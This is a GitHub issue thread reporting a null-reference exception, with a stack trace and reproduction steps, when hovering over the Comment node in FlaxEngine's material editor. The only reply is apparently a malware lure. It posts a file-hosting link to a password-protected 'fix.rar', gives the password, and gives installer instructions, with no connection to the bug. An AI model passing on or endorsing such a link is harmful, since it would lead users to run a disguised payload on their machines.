### ISSUE TITLE
Error when hovering over Comment in add new node menu in material editor

### ISSUE THREAD

**Issue by xxSeys1** [FlaxEngine/FlaxEngine#2888]
**Issue description:**

https://github.com/user-attachments/assets/2bc21b25-87a3-4fd2-8d0a-84014942bcce

This is the error:
```
[ 00:14:10.151 ]: [Warning] Exception has been thrown during Window.OnMouseMove. Object reference not set to an instance of an object.
Stack strace:
   at FlaxEditor.Surface.ContextMenu.VisjectCM.SetDescriptionPanelArchetype(NodeArchetype archetype) in D:\a\FlaxEngine\FlaxEngine\Source\Editor\Surface\ContextMenu\VisjectCM.cs:line 880
   at FlaxEditor.Surface.ContextMenu.VisjectCMItem.OnMouseEnter(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Editor\Surface\ContextMenu\VisjectCMItem.cs:line 362
   at FlaxEngine.GUI.ContainerControl.OnMouseMove(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\UI\GUI\ContainerControl.cs:line 945
   at FlaxEngine.GUI.DropPanel.OnMouseMove(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\UI\GUI\Panels\DropPanel.cs:line 478
   at FlaxEngine.GUI.ContainerControl.OnMouseMove(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\UI\GUI\ContainerControl.cs:line 940
   at FlaxEngine.GUI.ContainerControl.OnMouseMove(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\UI\GUI\ContainerControl.cs:line 940
   at FlaxEngine.GUI.ContainerControl.OnMouseMove(Float2 location) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\UI\GUI\ContainerControl.cs:line 940
   at FlaxEngine.Window.Internal_OnMouseMove(Float2& mousePos) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\Platform\Window.cs:line 274
   at FlaxEngine.Interop.NativeInterop.Invoker.InvokerNoRet1`2.MarshalAndInvoke(Object delegateContext, ManagedHandle instancePtr, IntPtr paramPtr) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\Engine\NativeInterop.Invoker.cs:line 334
   at FlaxEngine.Interop.NativeInterop.InvokeMethod(ManagedHandle instanceHandle, ManagedHandle methodHandle, IntPtr paramPtr, IntPtr exceptionPtr) in D:\a\FlaxEngine\FlaxEngine\Source\Engine\Engine\NativeInterop.Unmanaged.cs:line 763
[ 00:14:10.151 ]: [Error] Exception has been thrown during Window.OnMouseMove.
Object reference not set to an instance of an object.
```

**Steps to reproduce:**

1. Open the material editor
2. Right click and search for *Comment*
3. Hover over the *Comment* entry in the tree

**Minimal reproduction project:**

none

**Flax version:**

Latest launcher master as of 8/27/204

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
